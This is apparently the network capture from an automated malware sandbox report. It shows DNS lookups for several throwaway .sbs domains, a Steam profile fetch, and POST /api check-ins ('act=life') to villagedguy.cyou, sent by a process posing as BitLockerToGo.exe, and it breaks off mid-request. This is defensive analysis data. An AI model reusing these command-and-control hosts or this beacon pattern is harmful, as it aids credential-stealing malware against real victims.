                                                                                                                                                                        Oct 31, 2024 01:05:26.511323929 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.511339903 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.594139099 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.594232082 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.594321012 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.594605923 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.594641924 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.241219997 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.241444111 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.242652893 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.242697001 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.242925882 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.244626045 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.244755030 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.244796991 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.946172953 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.946269989 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.946348906 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.946692944 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.946738958 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.150660038 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.150697947 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.150762081 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.151283979 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.151297092 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.760766029 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.760828972 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.761895895 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.761904955 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.762182951 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.763256073 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.763370991 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.763406038 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.763477087 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.763484955 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:30.894750118 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:30.894866943 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:30.894937992 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:30.895054102 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:30.895076036 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.229635000 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.229739904 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.229836941 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.230123997 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.230161905 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.839014053 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.839112997 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.840233088 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.840281963 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.840527058 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.841691971 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.841804028 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.841841936 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.311294079 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.311392069 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.311463118 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.312036991 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.312082052 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.646065950 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.646115065 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.646198988 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.646533012 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.646545887 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.256228924 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.256303072 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.257484913 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.257496119 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.257735968 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.258882999 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.258979082 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.259001970 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.735585928 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.735683918 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.735743046 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.738683939 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.738704920 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.898740053 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.898780107 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.898865938 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.899183989 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.899197102 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.504427910 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.504538059 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.505803108 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.505814075 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.506042004 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.508285999 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.508367062 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.508372068 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.982683897 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.982820988 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.982882977 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.982975960 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.982990980 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.106194973 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.106247902 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.106347084 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.106642962 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.106656075 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.710856915 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.711061001 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.712194920 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.712204933 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.712408066 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.731758118 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.731837034 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.731843948 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:36.039542913 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:36.039673090 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:36.039741039 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:36.039834976 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:36.039859056 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:36.091118097 CET49746443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:36.091171026 CET44349746104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:36.091238022 CET49746443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:36.091686010 CET49746443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:36.091706038 CET44349746104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:36.610814095 CET49746443192.168.2.4104.21.32.196

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 31, 2024 01:05:20.635488033 CET6373553192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.644352913 CET53637351.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.647197008 CET5906653192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.657962084 CET53590661.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.659161091 CET5241253192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.668311119 CET53524121.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.670625925 CET6221353192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.679044008 CET53622131.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.681200027 CET5890453192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.689716101 CET53589041.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.691870928 CET5731953192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.700426102 CET53573191.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.704814911 CET6092553192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.713851929 CET53609251.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.715001106 CET4962653192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.723653078 CET53496261.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.725841999 CET5984653192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:20.733666897 CET53598461.1.1.1192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.543515921 CET6202653192.168.2.41.1.1.1
                                                                                                                                                                        Oct 31, 2024 01:05:22.556458950 CET53620261.1.1.1192.168.2.4

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Oct 31, 2024 01:05:20.635488033 CET192.168.2.41.1.1.10xc4ccStandard query (0)deepymouthi.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.647197008 CET192.168.2.41.1.1.10x555cStandard query (0)monstourtu.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.659161091 CET192.168.2.41.1.1.10x8f34Standard query (0)heroicmint.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.670625925 CET192.168.2.41.1.1.10x8a01Standard query (0)sidercotay.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.681200027 CET192.168.2.41.1.1.10xad99Standard query (0)captaitwik.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.691870928 CET192.168.2.41.1.1.10x599dStandard query (0)wrigglesight.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.704814911 CET192.168.2.41.1.1.10x2dc8Standard query (0)ferrycheatyk.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.715001106 CET192.168.2.41.1.1.10x769Standard query (0)snailyeductyi.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.725841999 CET192.168.2.41.1.1.10x31e9Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:22.543515921 CET192.168.2.41.1.1.10xb433Standard query (0)villagedguy.cyouA (IP address)IN (0x0001)false

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Oct 31, 2024 01:05:20.644352913 CET1.1.1.1192.168.2.40xc4ccName error (3)deepymouthi.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.657962084 CET1.1.1.1192.168.2.40x555cName error (3)monstourtu.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.668311119 CET1.1.1.1192.168.2.40x8f34Name error (3)heroicmint.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.679044008 CET1.1.1.1192.168.2.40x8a01Name error (3)sidercotay.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.689716101 CET1.1.1.1192.168.2.40xad99Name error (3)captaitwik.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.700426102 CET1.1.1.1192.168.2.40x599dName error (3)wrigglesight.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.713851929 CET1.1.1.1192.168.2.40x2dc8Name error (3)ferrycheatyk.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.723653078 CET1.1.1.1192.168.2.40x769Name error (3)snailyeductyi.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:20.733666897 CET1.1.1.1192.168.2.40x31e9No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:22.556458950 CET1.1.1.1192.168.2.40xb433No error (0)villagedguy.cyou104.21.32.196A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 31, 2024 01:05:22.556458950 CET1.1.1.1192.168.2.40xb433No error (0)villagedguy.cyou172.67.154.113A (IP address)IN (0x0001)false

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                        • villagedguy.cyou

                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.449734104.102.49.2544432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:21 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                        2024-10-31 00:05:22 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:21 GMT
                                                                                                                                                                        Content-Length: 35954
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: sessionid=447d09e58bc3481a7560f95d; Path=/; Secure; SameSite=None
                                                                                                                                                                        Set-Cookie: steamCountry=US%7Ccd7cb03e35e41f48f2bf1c7941cd6349; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                        2024-10-31 00:05:22 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                        2024-10-31 00:05:22 UTC16384INData Raw: 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22
                                                                                                                                                                        Data Ascii: a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem"
                                                                                                                                                                        2024-10-31 00:05:22 UTC3768INData Raw: 61 72 20 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 69 7a 65 20 6f 66 66 6c 69 6e 65 22 20 64 61 74 61 2d 6d 69 6e 69 70 72 6f 66 69 6c 65 3d 22 31 37 36 34 30 36 36 31 37 32 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 79 65 72 41 76 61 74 61 72 41 75 74 6f 53 69 7a 65 49 6e 6e 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76
                                                                                                                                                                        Data Ascii: ar profile_header_size offline" data-miniprofile="1764066172"><div class="playerAvatarAutoSizeInner"><img src="https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div></div
                                                                                                                                                                        2024-10-31 00:05:22 UTC1335INData Raw: 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 73 6b 69 6e 5f 31 2f 66 6f 6f 74 65 72 4c 6f 67 6f 5f 76 61 6c 76 65 2e 70 6e 67 3f 76 3d 31 22 20 77 69 64 74 68 3d 22 39 36 22 20 68 65 69 67 68 74 3d 22 32 36 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 56 61 6c 76 65 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 54 65 78 74 22 3e 0d 0a 09 09 09 09 09 26 63 6f 70 79 3b 20 56 61 6c 76 65 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 41 6c 6c 20 74 72 61 64 65 6d 61 72 6b 73 20 61 72 65 20 70 72 6f 70 65 72 74 79 20 6f 66 20 74 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e 65 72 73 20 69 6e 20 74 68 65
                                                                                                                                                                        Data Ascii: .com/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo" /></span><span id="footerText">&copy; Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.449736104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:23 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        Host: villagedguy.cyou
                                                                                                                                                                        2024-10-31 00:05:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                        2024-10-31 00:05:23 UTC1005INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 31 Oct 2024 00:05:23 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=1foaruqrf9hujs0vrelprdukgp; expires=Sun, 23-Feb-2025 17:52:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cNEifAhWiQa0LJRGodP3iVGLynY1GH4UP1XAQ%2FA93dp4Bo0hplhU%2F1U9M84T0kDWu3lOef2LQlgb1eJHwOmDfBiWWIJJoNU84sCR2WJR4J83Y56Jkq0QGVIZNcPxtRLDZsrR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64a48f5a463e-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1988&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=907&delivery_rate=1455276&cwnd=249&unsent_bytes=0&cid=7d5ef95828c7bd96&ts=510&x=0"
                                                                                                                                                                        2024-10-31 00:05:23 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                        2024-10-31 00:05:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.449738104.21.32.1964432676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-10-31 00:05:24 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 75
                                                                                                                                                                        Host: villagedguy.cyou
